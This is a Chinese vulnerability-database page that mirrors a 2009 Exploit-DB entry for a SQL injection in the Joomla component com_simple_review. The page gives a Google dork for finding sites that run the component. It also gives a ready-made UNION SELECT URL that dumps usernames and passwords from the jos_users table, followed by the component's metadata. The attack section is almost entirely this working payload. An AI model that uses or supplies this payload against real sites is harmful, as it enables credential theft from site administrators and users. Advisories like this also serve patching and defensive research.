Joomla! Component simple_review 1.x - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057224 漏洞类型
发布时间 2009-01-05 更新时间 2009-01-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7667
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#Joomla com_simple_review Sql injection#
########################################
#[~] Author :  EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label Hippi Godlike Nitrous

#[!] Module_Name:  com_simple_review
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_simple_review"
########################################
 
www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--

 <name>simple_review</name>
 <creationDate>29/05/2006</creationDate>
 <author>Rowan Youngson</author>
 <copyright>This component in released under the Mozilla Public License Version 1.1</copyright>
 <authorEmail> rowans@gmail.com </authorEmail>

 <authorUrl>www.row1.info</authorUrl>
 <version>1.3.5</version>
 <description>Simple Review is a Review component for the Mambo CMS</description>

# milw0rm.com [2009-01-05]